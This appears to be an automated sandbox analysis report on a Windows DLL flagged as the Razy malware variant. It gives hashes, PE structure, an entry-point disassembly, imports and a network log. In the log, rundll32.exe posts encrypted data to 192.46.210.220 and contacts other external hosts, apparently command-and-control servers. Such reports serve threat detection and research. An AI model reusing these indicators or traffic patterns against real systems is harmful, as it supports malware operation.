                                                                                                      SHA1:9E2F81F9FDB827236B44C8A26B677C77BAFC238D
                                                                                                      SHA-256:6974761B4D692BABA93674581E25235A10C1C8CF2223A96F31B162D322A61267
                                                                                                      SHA-512:2ED50B852CE1F09D1524EE9ED9658C086C30CFBEE9A1B4625E407A5AB1492CECA40530A8171C9791E860BB49C3EA862532BE49C15C891BDC53E25DC00B39A0CA
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: p...... ........$.......(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.439689119826881
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:SecuriteInfo.com.Variant.Razy.980776.28328.dll
                                                                                                      File size:1375232
                                                                                                      MD5:d0efc72dad5672591a494c15ab074463
                                                                                                      SHA1:4489c041b31862a797a277c2d3f65e53c55d4e27
                                                                                                      SHA256:c16c257b6858f74dfba0685a833f4966ccc8e9d4d25d8c0c052109187e37c3ac
                                                                                                      SHA512:c465cc1495f737526749638c1697bd02957c207eeb84700850bc065dc2eab9f8c3013668d50d39664a997339a641acd059c6498788323f19cc9956cc9293b965
                                                                                                      SSDEEP:24576:/nxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu79:/cfk82uAJTI7xPswKwuS
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xl..<..Y<..Y<..Y...Y8..Y5u.Y&..Yne.X8..Yne.X%..Yne.X/..Yne.X...Y...Y...Y<..Y\..Yne.X...Yne.X=..Yne.Y=..Yne.X=..YRich<..Y.......

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4336b0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x5BBD6705 [Wed Oct 10 02:42:13 2018 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                      jne 00007F6B6CA36037h
                                                                                                      call 00007F6B6CA36D67h
                                                                                                      mov eax, dword ptr [ebp+10h]
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      push ecx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      push edx
                                                                                                      call 00007F6B6CA35E26h
                                                                                                      add esp, 0Ch
                                                                                                      pop ebp
                                                                                                      retn 000Ch
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      push edx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      xor edx, dword ptr [0054806Ch]
                                                                                                      push edx
                                                                                                      call 00007F6B6CA36074h
                                                                                                      add esp, 08h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      mov eax, 00000020h
                                                                                                      sub eax, edx
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                                      push ecx
                                                                                                      call 00007F6B6CA36043h
                                                                                                      add esp, 08h
                                                                                                      xor eax, dword ptr [0054806Ch]
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      ror eax, cl
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      call 00007F6B6CA373CDh
                                                                                                      push eax
                                                                                                      call 00007F6B6CA780D7h
                                                                                                      add esp, 04h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 18h
                                                                                                      mov eax, dword ptr [ebp+00h]

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xc5e2f0xc6000False0.442064689867data6.47811762897IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xc70000x80aec0x80c00False0.534101941748data5.5205240777IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Bluewing10x49eed0
                                                                                                      Earth20x49efd0
                                                                                                      Masterjust30x49eb20

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 28, 2021 04:46:19.655874014 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:19.655925989 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:19.656018972 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:19.795279980 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:19.795329094 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:20.330322981 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:20.330491066 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:20.744916916 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:20.744950056 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:20.745537996 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:20.745676041 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:20.749816895 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:20.749960899 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:20.750066042 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:21.456640005 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:21.456731081 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:21.456772089 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:21.456794977 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:21.464390993 CEST49767443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:21.464442015 CEST44349767192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:21.953500986 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:22.113073111 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:22.113179922 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:22.120815992 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:22.280575037 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:22.282573938 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:22.282705069 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:26.128861904 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:26.288451910 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.288779020 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.288849115 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:26.289513111 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:26.289572954 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:26.448791981 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.448826075 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.448843956 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.448875904 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.590584040 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:26.590631008 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.590837002 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:26.641381979 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:26.641408920 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.829649925 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.829684019 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:26.829792023 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:26.836330891 CEST49768808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:26.995676041 CEST80849768143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.163271904 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.163377047 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:27.210407019 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.376801968 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.376919031 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.377983093 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.511022091 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:27.511049986 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.511425972 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.511573076 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:27.515443087 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:27.515574932 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:27.515594959 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.544285059 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.545372009 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.545504093 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.554241896 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.721097946 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.721599102 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.722263098 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.722368002 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:27.888715029 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:27.888745070 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.228498936 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.228581905 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.228586912 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:28.228647947 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:28.231688976 CEST49771443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:46:28.231709957 CEST44349771192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.275033951 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.275053978 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.275120020 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:28.281326056 CEST497776891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:46:28.404427052 CEST49780808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:28.406874895 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.449026108 CEST68914977745.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.464354992 CEST811649781185.56.219.47192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.464437962 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.465183973 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.522026062 CEST811649781185.56.219.47192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.530991077 CEST811649781185.56.219.47192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.531017065 CEST811649781185.56.219.47192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.531101942 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.531128883 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.537200928 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.577143908 CEST80849780143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.577295065 CEST49780808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:28.578105927 CEST49780808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:46:28.595105886 CEST811649781185.56.219.47192.168.2.7
                                                                                                      Oct 28, 2021 04:46:28.596151114 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.596961975 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.597002983 CEST497818116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:46:28.653904915 CEST811649781185.56.219.47192.168.2.7

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 192.46.210.220

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.749767192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:20 UTC0OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:20 UTC0OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:21 UTC4INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.749771192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:27 UTC5OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:27 UTC5OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:28 UTC9INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:28 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.749816192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:46 UTC49OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:46 UTC50OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:46 UTC54INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.749820192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:48 UTC54OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:48 UTC55OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:49 UTC59INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:49 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.749824192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:50 UTC59OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
